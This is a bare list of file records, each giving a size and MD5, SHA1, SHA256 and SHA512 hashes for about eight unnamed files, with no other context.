SHA5126ba0db71de31f8ce3ee1cf84581015ac3bfc7fd898121214f92ba14b0f2b3bf75e11e9941c6d83f71364399af6be6159f141e78bde6b4f42036020842ff32381
-
Filesize
1.7MB
MD51e95dc10fef7079a5d3fa793732a7cce
SHA18e9ccb511e76c921c6ddf2a2615a2e3c86ea4113
SHA25681ac77037e15e56a6cdc0ba7e2af38e3e5a9f7a353054276c763e57d03db5ec1
SHA512c35cb0cc0cc9046acab79fc70e26c28fa32f86e79dc36d44f938efada6bd45b190746d6f966552aa3eba45967b7f3ba7e113d8593576b7bb7f7fcaf670a23773
-
Filesize
3.5MB
MD5f57495f53acd120aecedd85d16ba34ab
SHA164b0576fa1e754318fa8ee9c3bd04307af707bda
SHA2568d7d52c04fbd9fb28348d8b0346b1331ae5f93f1c3063a67c89a5c4ee1330eba
SHA51224a922d508ee2f66cfb9c7706376e1636494e6a7a45d1328b7e11c229151dfe9bc1333e6ab9a706bac7aa57f8a67405b11ac08d49f8441c308d4596f31d0ede1
-
Filesize
1.8MB
MD593da4bdbae52d91d32a34c140466e8cf
SHA12177f234160ef77058d2237a8f97c1d663647240
SHA256878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA51214d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a
-
Filesize
3.0MB
MD55e79df97975b488e901487db545d5de8
SHA12cc617e5bd4cf348b8a1fccf2716686cf2c63fe6
SHA256aa38c813aafc36532f6d8e826f2f7665b26c2c0ef2ff7395c21230f2640cb966
SHA5125bbfee010c11ba03ef2db2a7a0280aae19f94aced5b2bb2085d5ea97a5d321d89368912cf8d563cbeb7de0f755ef5990adf9199b5f172d115bdc6e6e4442571f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.9MB
MD5b826dd92d78ea2526e465a34324ebeea
SHA1bf8a0093acfd2eb93c102e1a5745fb080575372e
SHA2567824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b
SHA5121ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17
-
Filesize
717B
MD55edc9176d596bafa3fdbd9ba6833f458
SHA13241c5420023da045db15467a6818cb7d55fa8df
SHA25687eb795ca39291753ccfee5e294d793f2fd95dcd5b391a17c6bbffb13186669c
SHA512e1e9be179451598e9194d6d956f8fa1749f2008bade470b95e8f874305e3a23c1d359076f9d5739c9475ac7f22bf9a47ea421b55b1040609d4ac71a7aaabcd75
-
Filesize
2KB
MD5bcf080c051a4a3105219f1e462fdaead
SHA137069bb6e423bb038780367a463e0a29e11d0b27
SHA2562da3eac1eec45209c5dfeab93135372dd476b1960e598ee9067fc56843e8820c
SHA5125e8f50a7a04ba543999b3555f49c36619fde98179bf1bbd9aa40d44c939e913dd241b0ba446410f3488f810c76f62e18faaa1f0f714d342d732b94db082a11af